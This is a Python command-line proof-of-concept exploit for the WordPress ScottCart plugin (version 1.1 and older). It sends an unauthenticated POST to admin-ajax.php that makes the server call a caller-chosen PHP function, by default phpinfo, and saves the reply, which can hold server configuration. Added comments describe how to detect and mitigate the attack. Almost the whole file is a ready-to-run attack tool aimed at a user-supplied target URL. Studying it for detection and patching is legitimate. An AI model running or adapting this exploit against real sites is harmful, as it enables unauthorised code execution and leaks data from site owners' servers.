import argparse
import sys
from datetime import datetime
from urllib.parse import urljoin

import requests

# By Nxploited | Khaled Alenazi,
#
# Proof-of-concept for the issue the CLI banner names: "ScottCart <= 1.1 -
# Unauthenticated Remote Code Execution".  The script sends one POST to
# WordPress' admin-ajax.php carrying action=scottcart_load_function and a
# caller-chosen "function" value, prints the reply and stores it in a file.
#
# Reading this as a defender:
#   * Detection: a POST to /wp-admin/admin-ajax.php whose body contains
#     action=scottcart_load_function from a client with no WordPress session
#     is the request this script produces.  The User-Agent below is a fixed
#     string and is only a weak indicator, since any client can change it.
#   * Mitigation: on sites running ScottCart 1.1 or older, deactivate or
#     remove the plugin (or move to a fixed release if the vendor ships one),
#     and block that AJAX action for unauthenticated clients at the WAF or
#     reverse proxy in the meantime.

# Silences urllib3's certificate warnings, which would otherwise fire on every
# request because the session below turns TLS verification off.
requests.packages.urllib3.disable_warnings()

HEADERS = {
    "User-Agent": (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/113.0.0.0 Safari/537.36"
    )
}


def create_session():
    """Return a requests.Session with TLS certificate verification disabled.

    With verification off the peer is not authenticated, so a response
    received over HTTPS may have been altered in transit; keep that in mind
    when treating the saved output as evidence.
    """
    http = requests.Session()
    http.verify = False
    return http


def build_target_url(base_url):
    """Return the admin-ajax.php URL derived from *base_url*.

    The endpoint is given as an absolute path, so urljoin keeps only the
    scheme and host of *base_url* and replaces any path it carried.
    """
    ajax_endpoint = "/wp-admin/admin-ajax.php"
    return urljoin(base_url, ajax_endpoint)


def build_payload(function_name):
    """Return the form fields of the request.

    "action" selects the plugin's AJAX handler and "function" carries the
    name passed on the command line; both are sent as ordinary POST data.
    """
    return dict(action="scottcart_load_function", function=function_name)


def make_post_request(session, target_url, payload):
    """POST *payload* to *target_url* and return the response.

    Any requests-level failure (connection error, timeout, ...) is reported
    on stdout and ends the process with exit status 1.
    """
    try:
        return session.post(target_url, data=payload, headers=HEADERS, timeout=10)
    except requests.exceptions.RequestException as err:
        print(f"[!] Error during request: {err}")
        sys.exit(1)


def format_timestamp():
    """Return the current local time as YYYY-MM-DD_HH-MM-SS."""
    return f"{datetime.now():%Y-%m-%d_%H-%M-%S}"


def generate_filename(timestamp):
    """Return the name of the results file for *timestamp*."""
    return "results_{}.txt".format(timestamp)


def save_output_to_file(output, timestamp):
    """Write *output* to results_<timestamp>.txt in the working directory.

    The file holds the raw server reply.  With the default "phpinfo" argument
    that reply can include server configuration and environment values, so
    the file should be handled as sensitive data.  Failures are reported on
    stdout and not re-raised.
    """
    filename = generate_filename(timestamp)
    header_line = f"# Timestamp: {timestamp}\n\n"
    try:
        with open(filename, "w", encoding="utf-8") as out:
            out.write(header_line)
            out.write(output)
        print(f"[+] Output saved to {filename}")
    except Exception as err:
        print(f"[!] Failed to save output: {err}")


def handle_response(response):
    """Print the outcome of the request and return the stripped body.

    The verdict is based on the status code alone: 200 is reported as
    success, anything else as failure.  A 200 only shows that the endpoint
    answered; whether the named function actually ran has to be judged from
    the body itself.
    """
    status = response.status_code
    body = response.text.strip()
    if status != 200:
        print(f"[!] Exploit failed with HTTP {status}")
    else:
        print("[+] Exploit successful! Output:\n")
    print(body)
    return body


def exploit(url, function_name):
    """Send the single request for *url* and store whatever comes back.

    The response body is saved regardless of the status code, so a results
    file is produced for failed attempts as well.
    """
    response = make_post_request(
        create_session(),
        build_target_url(url),
        build_payload(function_name),
    )
    body = handle_response(response)
    save_output_to_file(body, format_timestamp())


def parse_arguments():
    """Parse the command line: -u/--url (required) and -p/--payload."""
    banner = (
        " ScottCart <= 1.1 - Unauthenticated Remote Code Execution "
        "By Nxploit Khaled Alenazi. "
    )
    cli = argparse.ArgumentParser(description=banner)
    cli.add_argument(
        "-u",
        "--url",
        required=True,
        help="Target base URL (e.g., http://192.168.100.74:888/wordpress)",
    )
    cli.add_argument(
        "-p",
        "--payload",
        default="phpinfo",
        help="Function to call (default: phpinfo)",
    )
    return cli.parse_args()


def main():
    """Entry point: read the arguments and run the request once."""
    options = parse_arguments()
    exploit(options.url, options.payload)


if __name__ == "__main__":
    main()